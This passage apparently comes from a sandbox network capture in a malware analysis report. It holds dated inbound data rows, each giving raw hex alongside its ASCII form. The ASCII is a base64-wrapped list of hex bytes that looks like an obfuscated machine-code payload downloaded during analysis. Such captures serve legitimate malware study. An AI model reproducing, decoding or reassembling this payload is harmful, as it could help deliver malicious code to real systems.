FLGA5MixgNDcsYEQ5LGBFMSxgOTEsYDE5LGBDQixgNzYsYDhGLGBEQixgODksYEE1LGAxMixgQkQsYEVBLGA2QyxgQUYsYEQ4LGBENyxgODcsYEZDLGA5RCxgQjEsYEE3LGA5MixgREYsYDExLGA3RSxgOTcsYERFLGBDRCxgRTcsYDBGLGBGOSxgMkQsYDYwLGAyOSxgM0QsYDE5LGAwOSxgMDAsYDNFLGAzMixgOUYsYDYyLGA4MyxgMjQsYD
2021-12-02 17:26:37 UTC	864	IN	Data Raw: 33 4c 47 41 77 52 69 78 67 52 6b 59 73 59 44 45 35 4c 47 42 45 4e 79 78 67 52 6b 45 73 59 44 56 47 4c 47 42 47 51 79 78 67 4f 44 63 73 59 45 5a 46 4c 47 42 44 52 69 78 67 4d 30 59 73 59 45 59 34 4c 47 42 47 51 69 78 67 52 6a 67 73 59 45 5a 42 4c 47 41 34 52 69 78 67 4f 54 49 73 59 45 4a 47 4c 47 41 33 52 69 78 67 52 54 45 73 59 44 4e 47 4c 47 42 47 4e 43 78 67 4e 45 49 73 59 44 4e 46 4c 47 42 47 4f 53 78 67 4d 55 49 73 59 45 59 77 4c 47 42 47 4e 79 78 67 52 45 59 73 59 44 49 32 4c 47 41 33 52 69 78 67 52 6b 59 73 59 45 55 78 4c 47 42 47 52 69 78 67 52 44 41 73 59 45 4a 47 4c 47 42 47 52 53 78 67 4f 45 59 73 59 44 46 47 4c 47 42 46 4d 79 78 67 52 55 59 73 59 45 4a 47 4c 47 41 30 4f 43 78 67 52 6b 55 73 59 45 5a 46 4c 47 42 44 4e 79 78 67 52 6b 59 73 59 45 Data Ascii: 3LGAwRixgRkYsYDE5LGBENyxgRkEsYDVGLGBGQyxgODcsYEZFLGBDRixgM0YsYEY4LGBGQixgRjgsYEZBLGA4RixgOTIsYEJGLGA3RixgRTEsYDNGLGBGNCxgNEIsYDNFLGBGOSxgMUIsYEYwLGBGNyxgREYsYDI2LGA3RixgRkYsYEUxLGBGRixgRDAsYEJGLGBGRSxgOEYsYDFGLGBFMyxgRUYsYEJGLGA0OCxgRkUsYEZFLGBDNyxgRkYsYE
2021-12-02 17:26:37 UTC	880	IN	Data Raw: 47 4c 47 42 43 52 43 78 67 4e 30 59 73 59 44 51 34 4c 47 42 44 4f 43 78 67 52 6b 49 73 59 45 46 47 4c 47 42 47 52 43 78 67 4e 7a 55 73 59 45 45 33 4c 47 41 33 52 69 78 67 4d 7a 67 73 59 45 5a 47 4c 47 41 31 4d 69 78 67 52 6b 59 73 59 44 42 47 4c 47 42 43 52 69 78 67 51 6b 51 73 59 44 68 44 4c 47 42 46 4d 69 78 67 4d 7a 63 73 59 44 64 45 4c 47 42 43 4d 53 78 67 51 55 55 73 59 45 59 35 4c 47 41 35 4e 79 78 67 4e 54 63 73 59 45 5a 47 4c 47 42 47 4e 79 78 67 4f 45 49 73 59 45 4a 47 4c 47 41 35 51 69 78 67 4e 30 59 73 59 45 59 35 4c 47 42 46 4d 79 78 67 52 6b 59 73 59 45 49 33 4c 47 42 46 51 53 78 67 4d 6a 63 73 59 44 41 31 4c 47 42 44 52 53 78 67 4e 30 59 73 59 45 5a 42 4c 47 42 46 4d 43 78 67 51 6a 63 73 59 45 55 32 4c 47 41 31 52 69 78 67 52 6b 55 73 59 45 Data Ascii: GLGBCRCxgN0YsYDQ4LGBDOCxgRkIsYEFGLGBGRCxgNzUsYEE3LGA3RixgMzgsYEZGLGA1MixgRkYsYDBGLGBCRixgQkQsYDhDLGBFMixgMzcsYDdELGBCMSxgQUUsYEY5LGA5NyxgNTcsYEZGLGBGNyxgOEIsYEJGLGA5QixgN0YsYEY5LGBFMyxgRkYsYEI3LGBFQSxgMjcsYDA1LGBDRSxgN0YsYEZBLGBFMCxgQjcsYEU2LGA1RixgRkUsYE
2021-12-02 17:26:37 UTC	896	IN	Data Raw: 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 Data Ascii: sYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMD
2021-12-02 17:26:37 UTC	912	IN	Data Raw: 73 59 44 41 34 4c 47 41 77 51 69 78 67 51 30 45 73 59 44 42 47 4c 47 42 43 4e 69 78 67 4e 54 41 73 59 44 42 46 4c 47 41 34 4d 53 78 67 52 54 45 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 4d 53 78 67 52 54 49 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 41 77 4c 47 42 44 4d 53 78 67 52 54 45 73 59 44 41 34 4c 47 41 77 51 69 78 67 51 30 45 73 59 44 42 47 4c 47 42 43 4e 69 78 67 4e 54 41 73 59 44 42 47 4c 47 42 45 4d 53 78 67 52 55 45 73 59 45 4d 78 4c 47 42 46 4d 53 78 67 4d 44 63 73 59 44 42 43 4c 47 42 44 51 53 78 67 4f 45 45 73 59 44 55 77 4c 47 41 77 51 69 78 67 52 6a 59 73 59 45 4d 79 4c 47 41 77 4d 53 78 67 4e 7a 51 73 59 44 41 32 4c 47 41 34 4d 53 78 67 51 7a 6b 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 Data Ascii: sYDA4LGAwQixgQ0EsYDBGLGBCNixgNTAsYDBFLGA4MSxgRTEsYEZGLGBGRixgMDAsYDAwLGA4MSxgRTIsYEZGLGBGRixgRkYsYDAwLGBDMSxgRTEsYDA4LGAwQixgQ0EsYDBGLGBCNixgNTAsYDBGLGBEMSxgRUEsYEMxLGBFMSxgMDcsYDBCLGBDQSxgOEEsYDUwLGAwQixgRjYsYEMyLGAwMSxgNzQsYDA2LGA4MSxgQzksYDAwLGAwMCxgMD
2021-12-02 17:26:37 UTC	928	IN	Data Raw: 73 59 45 5a 45 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 4a 43 4c 47 41 78 4f 53 78 67 4d 54 6b 73 59 44 4d 79 4c 47 42 44 4e 79 78 67 4f 44 55 73 59 44 4a 44 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 35 4e 53 78 67 4e 7a 4d 73 59 44 63 7a 4c 47 42 46 4e 69 78 67 51 7a 63 73 59 44 67 31 4c 47 41 7a 4d 43 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 47 52 69 78 67 51 54 41 73 59 44 59 77 4c 47 41 32 4d 43 78 67 51 7a 41 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 4d 7a 51 73 59 45 5a 45 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 6b 34 4c 47 41 34 4d 53 78 67 4f 44 45 73 59 44 45 35 4c 47 42 44 4e 79 78 67 4f 44 55 73 59 44 4d 34 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 45 4d 53 78 67 4e 45 59 73 59 44 52 47 4c 47 41 35 52 53 78 67 51 7a Data Ascii: sYEZELGBGRixgRkYsYDJCLGAxOSxgMTksYDMyLGBDNyxgODUsYDJDLGBGRCxgRkYsYEZGLGA5NSxgNzMsYDczLGBFNixgQzcsYDg1LGAzMCxgRkQsYEZGLGBGRixgQTAsYDYwLGA2MCxgQzAsYEM3LGA4NSxgMzQsYEZELGBGRixgRkYsYDk4LGA4MSxgODEsYDE5LGBDNyxgODUsYDM4LGBGRCxgRkYsYEZGLGBEMSxgNEYsYDRGLGA5RSxgQz
2021-12-02 17:26:37 UTC	944	IN	Data Raw: 73 59 45 5a 47 4c 47 42 44 52 53 78 67 4d 7a 59 73 59 44 5a 47 4c 47 41 30 51 53 78 67 51 7a 63 73 59 44 67 31 4c 47 42 47 4f 43 78 67 52 6a 6b 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 44 51 73 59 44 41 35 4c 47 41 35 52 69 78 67 52 55 45 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 52 6b 4d 73 59 45 59 35 4c 47 42 47 52 69 78 67 52 6b 59 73 59 45 51 32 4c 47 41 33 51 79 78 67 51 6a 41 73 59 44 49 35 4c 47 42 44 4e 79 78 67 4f 44 55 73 59 44 41 77 4c 47 42 47 51 53 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 42 52 69 78 67 51 6a 49 73 59 45 45 30 4c 47 41 7a 4d 53 78 67 51 7a 63 73 59 44 67 31 4c 47 41 77 4e 43 78 67 52 6b 45 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4d 7a 45 73 59 44 49 7a 4c 47 41 7a 52 69 78 67 4d 6b 45 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 4d 44 Data Ascii: sYEZGLGBDRSxgMzYsYDZGLGA0QSxgQzcsYDg1LGBGOCxgRjksYEZGLGBGRixgRDQsYDA5LGA5RixgRUEsYEM3LGA4NSxgRkMsYEY5LGBGRixgRkYsYEQ2LGA3QyxgQjAsYDI5LGBDNyxgODUsYDAwLGBGQSxgRkYsYEZGLGBBRixgQjIsYEE0LGAzMSxgQzcsYDg1LGAwNCxgRkEsYEZGLGBGRixgMzEsYDIzLGAzRixgMkEsYEM3LGA4NSxgMD
2021-12-02 17:26:37 UTC	960	IN	Data Raw: 73 59 44 67 78 4c 47 42 46 4d 79 78 67 52 6b 59 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 42 47 4c 47 42 43 4e 69 78 67 4e 55 4d 73 59 44 6b 34 4c 47 41 77 4e 53 78 67 4d 7a 4d 73 59 45 5a 43 4c 47 41 7a 4d 79 78 67 4d 7a 6b 73 59 44 68 43 4c 47 42 45 52 69 78 67 51 7a 45 73 59 45 4e 43 4c 47 41 77 4f 43 78 67 4f 44 45 73 59 45 55 7a 4c 47 41 77 4d 43 78 67 52 6b 59 73 59 44 41 77 4c 47 42 47 52 69 78 67 51 7a 45 73 59 45 4d 33 4c 47 41 77 4f 43 78 67 4f 44 45 73 59 45 55 33 4c 47 42 47 52 69 78 67 4d 44 41 73 59 45 5a 47 4c 47 41 77 4d 43 78 67 4d 45 49 73 59 45 52 47 4c 47 41 34 51 69 78 67 4e 30 51 73 59 44 42 44 4c 47 41 34 4f 53 78 67 4d 55 59 73 59 44 68 43 4c 47 41 31 52 43 78 67 52 6a 51 73 59 45 4d 78 4c 47 42 47 51 69 78 67 4d 54 Data Ascii: sYDgxLGBFMyxgRkYsYDAwLGAwMCxgMDAsYDBGLGBCNixgNUMsYDk4LGAwNSxgMzMsYEZCLGAzMyxgMzksYDhCLGBERixgQzEsYENCLGAwOCxgODEsYEUzLGAwMCxgRkYsYDAwLGBGRixgQzEsYEM3LGAwOCxgODEsYEU3LGBGRixgMDAsYEZGLGAwMCxgMEIsYERGLGA4QixgN0QsYDBDLGA4OSxgMUYsYDhCLGA1RCxgRjQsYEMxLGBGQixgMT
2021-12-02 17:26:37 UTC	976	IN	Data Raw: 73 59 44 67 35 4c 47 41 35 4e 53 78 67 4f 54 41 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b 59 73 59 45 55 34 4c 47 41 78 51 69 78 67 4e 30 55 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 68 47 4c 47 41 79 4d 43 78 67 4e 44 6b 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 45 73 59 44 68 45 4c 47 41 35 4e 53 78 67 4e 7a 67 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 55 79 4c 47 41 31 4e 69 78 67 52 54 67 73 59 45 49 33 4c 47 41 32 52 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 51 34 4c 47 41 34 4d 79 78 67 51 6b 55 73 59 45 59 30 4c 47 41 77 4f 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 67 33 4c 47 41 30 4d 43 78 67 52 44 67 73 59 44 46 47 4c 47 41 77 4d 43 78 67 4f 44 Data Ascii: sYDg5LGA5NSxgOTAsYEZFLGBGRixgRkYsYEU4LGAxQixgN0UsYDAxLGAwMCxgOEQsYDhGLGAyMCxgNDksYDAwLGAwMCxgNTEsYDhELGA5NSxgNzgsYEZFLGBGRixgRkYsYDUyLGA1NixgRTgsYEI3LGA2RSxgMDAsYDAwLGA4MyxgQzQsYDQ4LGA4MyxgQkUsYEY0LGAwOSxgMDAsYDAwLGAwMCxgOEQsYDg3LGA0MCxgRDgsYDFGLGAwMCxgOD
2021-12-02 17:26:37 UTC	992	IN	Data Raw: 73 59 45 4d 30 4c 47 41 7a 4f 43 78 67 4f 44 55 73 59 45 4d 77 4c 47 41 33 4e 53 78 67 4d 55 45 73 59 44 67 31 4c 47 42 45 51 69 78 67 4e 7a 51 73 59 44 42 42 4c 47 41 31 4d 79 78 67 4e 54 59 73 59 45 55 34 4c 47 41 33 4e 53 78 67 4e 7a 45 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 4f 43 78 67 4e 55 59 73 59 44 56 46 4c 47 42 43 4f 43 78 67 4d 44 51 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 56 43 4c 47 41 34 51 69 78 67 52 54 55 73 59 44 56 45 4c 47 42 44 4d 79 78 67 4f 45 49 73 59 44 55 31 4c 47 41 77 51 79 78 67 4f 45 49 73 59 44 51 31 4c 47 41 78 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 32 51 53 78 67 4d 55 49 73 59 44 68 45 4c 47 41 34 52 43 78 67 4f 54 67 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b Data Ascii: sYEM0LGAzOCxgODUsYEMwLGA3NSxgMUEsYDg1LGBEQixgNzQsYDBBLGA1MyxgNTYsYEU4LGA3NSxgNzEsYDAxLGAwMCxgODMsYEM0LGAwOCxgNUYsYDVFLGBCOCxgMDQsYDAwLGAwMCxgMDAsYDVCLGA4QixgRTUsYDVELGBDMyxgOEIsYDU1LGAwQyxgOEIsYDQ1LGAxMCxgNkEsYDAwLGA2QSxgMUIsYDhELGA4RCxgOTgsYEZFLGBGRixgRk
2021-12-02 17:26:37 UTC	1008	IN	Data Raw: 73 59 44 45 79 4c 47 42 47 4e 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 32 4f 43 78 67 51 6a 67 73 59 44 67 79 4c 47 41 30 4f 43 78 67 51 7a 67 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 31 4d 79 78 67 4e 54 63 73 59 44 67 35 4c 47 41 34 4e 69 78 67 4d 44 41 73 59 44 42 45 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 45 55 34 4c 47 42 47 51 79 78 67 52 6a 55 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 6a 67 73 59 45 59 35 4c 47 41 31 4e 43 78 67 52 54 6b 73 59 44 51 30 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 67 35 4c 47 41 34 4e 69 78 67 4d 44 67 73 59 44 42 45 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 43 4c 47 41 34 4e 69 78 67 51 54 41 73 59 44 42 43 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 54 Data Ascii: sYDEyLGBGNixgMDAsYDAwLGA2OCxgQjgsYDgyLGA0OCxgQzgsYDZBLGAwMCxgNkEsYDAwLGA1MyxgNTcsYDg5LGA4NixgMDAsYDBELGAwMCxgMDAsYEU4LGBGQyxgRjUsYDAwLGAwMCxgNjgsYEY5LGA1NCxgRTksYDQ0LGA2QSxgMDAsYDg5LGA4NixgMDgsYDBELGAwMCxgMDAsYDhCLGA4NixgQTAsYDBCLGAwMCxgMDAsYDZBLGAwMCxgNT
2021-12-02 17:26:37 UTC	1024	IN	Data Raw: 73 59 45 59 35 4c 47 41 34 51 69 78 67 4e 7a 51 73 59 44 41 7a 4c 47 41 34 4f 53 78 67 4e 7a 41 73 59 44 41 34 4c 47 41 34 4d 43 78 67 52 6a 6b 73 59 44 63 31 4c 47 41 33 4e 43 78 67 4d 44 4d 73 59 44 67 35 4c 47 41 33 4d 43 78 67 4d 45 4d 73 59 44 4d 35 4c 47 41 7a 4d 43 78 67 4e 7a 55 73 59 44 42 47 4c 47 41 7a 4f 53 78 67 4e 7a 41 73 59 44 41 30 4c 47 41 33 4e 53 78 67 4d 45 45 73 59 44 4d 35 4c 47 41 33 4d 43 78 67 4d 44 67 73 59 44 63 31 4c 47 41 77 4e 53 78 67 4d 7a 6b 73 59 44 63 77 4c 47 41 77 51 79 78 67 4e 7a 51 73 59 45 4d 31 4c 47 41 34 51 53 78 67 4e 45 59 73 59 44 41 79 4c 47 41 34 4d 43 78 67 52 6a 6b 73 59 44 45 77 4c 47 41 33 4e 43 78 67 4d 44 49 73 59 44 67 35 4c 47 41 7a 4d 43 78 67 4f 44 41 73 59 45 59 35 4c 47 41 77 4f 43 78 67 4e 7a Data Ascii: sYEY5LGA4QixgNzQsYDAzLGA4OSxgNzAsYDA4LGA4MCxgRjksYDc1LGA3NCxgMDMsYDg5LGA3MCxgMEMsYDM5LGAzMCxgNzUsYDBGLGAzOSxgNzAsYDA0LGA3NSxgMEEsYDM5LGA3MCxgMDgsYDc1LGAwNSxgMzksYDcwLGAwQyxgNzQsYEM1LGA4QSxgNEYsYDAyLGA4MCxgRjksYDEwLGA3NCxgMDIsYDg5LGAzMCxgODAsYEY5LGAwOCxgNz
2021-12-02 17:26:37 UTC	1040	IN	Data Raw: 73 59 44 42 47 4c 47 41 34 4e 43 78 67 51 54 59 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 68 42 4c 47 41 31 4e 79 78 67 4d 44 59 73 59 44 67 77 4c 47 42 47 51 53 78 67 4d 44 45 73 59 44 63 30 4c 47 41 77 4e 53 78 67 4f 44 6b 73 59 44 41 34 4c 47 41 34 4f 53 78 67 4e 44 67 73 59 44 41 30 4c 47 41 34 4d 43 78 67 52 6b 45 73 59 44 41 31 4c 47 41 33 4e 43 78 67 4d 44 6b 73 59 44 67 35 4c 47 41 30 4f 43 78 67 4d 45 4d 73 59 44 67 35 4c 47 41 30 4f 43 78 67 4d 54 41 73 59 44 67 35 4c 47 41 30 4f 43 78 67 4d 54 51 73 59 44 4d 35 4c 47 41 77 4f 43 78 67 4e 7a 55 73 59 44 46 45 4c 47 41 7a 4f 53 78 67 4e 44 67 73 59 44 41 30 4c 47 41 33 4e 53 78 67 4d 54 67 73 59 44 4d 35 4c 47 41 30 4f 43 78 67 4d 44 67 73 59 44 63 31 4c 47 41 78 4d 79 78 67 4d 7a Data Ascii: sYDBGLGA4NCxgQTYsYEZFLGBGRixgRkYsYDhBLGA1NyxgMDYsYDgwLGBGQSxgMDEsYDc0LGAwNSxgODksYDA4LGA4OSxgNDgsYDA0LGA4MCxgRkEsYDA1LGA3NCxgMDksYDg5LGA0OCxgMEMsYDg5LGA0OCxgMTAsYDg5LGA0OCxgMTQsYDM5LGAwOCxgNzUsYDFELGAzOSxgNDgsYDA0LGA3NSxgMTgsYDM5LGA0OCxgMDgsYDc1LGAxMyxgMz
2021-12-02 17:26:37 UTC	1056	IN	Data Raw: 73 59 44 5a 43 4c 47 41 77 4d 43 78 67 4e 6b 55 73 59 44 41 77 4c 47 42 44 4e 79 78 67 4e 44 55 73 59 45 55 34 4c 47 41 32 52 69 78 67 4d 44 41 73 59 44 63 33 4c 47 41 77 4d 43 78 67 51 7a 63 73 59 44 51 31 4c 47 42 46 51 79 78 67 4e 6b 55 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 45 55 34 4c 47 41 34 52 69 78 67 4e 44 45 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 51 79 78 67 4e 6b 45 73 59 44 45 30 4c 47 41 34 52 43 78 67 4e 45 51 73 59 45 4d 77 4c 47 41 31 4d 53 78 67 4f 44 45 73 59 45 4d 32 4c 47 42 45 51 79 78 67 4d 6a 41 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4e 54 59 73 59 45 55 34 4c 47 41 33 51 53 78 67 4e 44 45 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 34 52 43 78 67 4e 54 Data Ascii: sYDZCLGAwMCxgNkUsYDAwLGBDNyxgNDUsYEU4LGA2RixgMDAsYDc3LGAwMCxgQzcsYDQ1LGBFQyxgNkUsYDAwLGAwMCxgMDAsYEU4LGA4RixgNDEsYDAxLGAwMCxgODMsYEM0LGAwQyxgNkEsYDE0LGA4RCxgNEQsYEMwLGA1MSxgODEsYEM2LGBEQyxgMjAsYDAxLGAwMCxgNTYsYEU4LGA3QSxgNDEsYDAxLGAwMCxgNkEsYDAwLGA4RCxgNT
2021-12-02 17:26:37 UTC	1072	IN	Data Raw: 73 59 44 55 78 4c 47 41 34 4f 53 78 67 4f 55 51 73 59 45 4d 77 4c 47 42 47 51 79 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 46 4f 43 78 67 4d 55 45 73 59 44 4d 32 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 68 43 4c 47 41 35 4e 53 78 67 4f 54 67 73 59 45 59 35 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 68 45 4c 47 41 30 4e 53 78 67 51 54 67 73 59 44 55 77 4c 47 41 34 52 43 78 67 4e 45 51 73 59 45 51 30 4c 47 41 31 4d 53 78 67 4f 44 6b 73 59 44 55 31 4c 47 42 42 4f 43 78 67 4e 6a 67 73 59 44 4d 34 4c 47 41 77 4e 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 52 43 78 67 4e 54 55 73 59 45 49 30 4c 47 41 31 4d 69 78 67 4e 54 59 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 51 7a 51 73 59 45 5a 44 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 41 33 4c 47 41 77 4d 43 78 67 4d 44 Data Ascii: sYDUxLGA4OSxgOUQsYEMwLGBGQyxgRkYsYEZGLGBFOCxgMUEsYDM2LGAwMSxgMDAsYDhCLGA5NSxgOTgsYEY5LGBGRixgRkYsYDhELGA0NSxgQTgsYDUwLGA4RCxgNEQsYEQ0LGA1MSxgODksYDU1LGBBOCxgNjgsYDM4LGAwNCxgMDAsYDAwLGA4RCxgNTUsYEI0LGA1MixgNTYsYEM3LGA4NSxgQzQsYEZDLGBGRixgRkYsYDA3LGAwMCxgMD
2021-12-02 17:26:37 UTC	1088	IN	Data Raw: 73 59 44 41 32 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4e 69 78 67 52 54 67 73 59 44 4a 44 4c 47 41 31 4e 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 41 30 4c 47 41 34 4e 53 78 67 51 7a 41 73 59 44 42 47 4c 47 41 34 4e 53 78 67 52 6a 55 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 43 4c 47 41 34 4e 69 78 67 51 55 4d 73 59 44 42 44 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 47 4f 43 78 67 4d 44 45 73 59 44 63 31 4c 47 41 78 4d 53 78 67 4e 54 59 73 59 45 55 34 4c 47 41 30 4d 43 78 67 4e 44 59 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 59 73 59 45 55 34 4c 47 42 45 51 53 78 67 4d 6a 55 73 59 44 41 77 4c 47 41 77 4d 43 78 67 52 54 6b 73 59 44 67 79 4c 47 41 77 4d 43 78 67 4d 44 Data Ascii: sYDA2LGAwMSxgMDAsYDAwLGA1NixgRTgsYDJDLGA1NSxgMDAsYDAwLGA4MyxgQzQsYDA0LGA4NSxgQzAsYDBGLGA4NSxgRjUsYDAwLGAwMCxgMDAsYDhCLGA4NixgQUMsYDBDLGAwMCxgMDAsYDgzLGBGOCxgMDEsYDc1LGAxMSxgNTYsYEU4LGA0MCxgNDYsYDAwLGAwMCxgNTYsYEU4LGBEQSxgMjUsYDAwLGAwMCxgRTksYDgyLGAwMCxgMD
2021-12-02 17:26:37 UTC	1091	IN	Data Raw: 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 52 43 78 67 4f 44 55 73 59 45 55 30 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 31 4d 43 78 67 4e 6b 45 73 59 44 41 34 4c 47 41 32 51 53 78 67 4e 6b 55 73 59 44 5a 42 4c 47 41 32 51 79 78 67 4e 54 59 73 59 45 55 34 4c 47 42 42 52 53 78 67 51 6a 59 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 4f 43 78 67 4e 54 41 73 59 45 55 34 4c 47 42 42 4e 53 78 67 4d 7a 45 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 78 4d 43 78 67 4f 44 55 73 59 45 4d 77 4c 47 41 77 52 69 78 67 4f 44 55 73 59 44 68 44 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 52 43 78 67 4f 45 51 73 59 45 55 30 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 47 4c Data Ascii: AwMCxgMDAsYDAwLGA4RCxgODUsYEU0LGBGRCxgRkYsYEZGLGA1MCxgNkEsYDA4LGA2QSxgNkUsYDZBLGA2QyxgNTYsYEU4LGBBRSxgQjYsYDAwLGAwMCxgODMsYEM0LGAwOCxgNTAsYEU4LGBBNSxgMzEsYDAxLGAwMCxgODMsYEM0LGAxMCxgODUsYEMwLGAwRixgODUsYDhDLGAwMCxgMDAsYDAwLGA4RCxgOEQsYEU0LGBGRCxgRkYsYEZGL
2021-12-02 17:26:37 UTC	1107	IN	Data Raw: 42 47 52 69 78 67 52 6b 59 73 59 45 4d 78 4c 47 42 44 51 69 78 67 4d 44 49 73 59 44 68 45 4c 47 41 35 4e 43 78 67 4d 7a 49 73 59 45 51 32 4c 47 42 44 4d 53 78 67 4e 6a 49 73 59 45 4e 42 4c 47 41 34 51 69 78 67 52 6a 41 73 59 44 4d 7a 4c 47 42 44 4d 79 78 67 4f 44 6b 73 59 44 52 45 4c 47 42 47 4e 43 78 67 4f 45 49 73 59 44 52 45 4c 47 42 47 4f 43 78 67 4d 7a 4d 73 59 45 4d 78 4c 47 41 77 4d 79 78 67 4f 44 51 73 59 45 4a 45 4c 47 42 43 51 79 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 44 6b 73 59 44 55 31 4c 47 42 47 4f 43 78 67 51 7a 45 73 59 45 4d 79 4c 47 41 77 4e 53 78 67 4d 44 4d 73 59 44 55 31 4c 47 42 47 4e 43 78 67 4f 44 6b 73 59 44 63 31 4c 47 42 47 4e 43 78 67 51 7a 45 73 59 45 4d 35 4c 47 41 77 4d 69 78 67 4f 45 51 73 59 44 67 30 4c Data Ascii: BGRixgRkYsYEMxLGBDQixgMDIsYDhELGA5NCxgMzIsYEQ2LGBDMSxgNjIsYENBLGA4QixgRjAsYDMzLGBDMyxgODksYDRELGBGNCxgOEIsYDRELGBGOCxgMzMsYEMxLGAwMyxgODQsYEJELGBCQyxgRkUsYEZGLGBGRixgODksYDU1LGBGOCxgQzEsYEMyLGAwNSxgMDMsYDU1LGBGNCxgODksYDc1LGBGNCxgQzEsYEM5LGAwMixgOEQsYDg0L
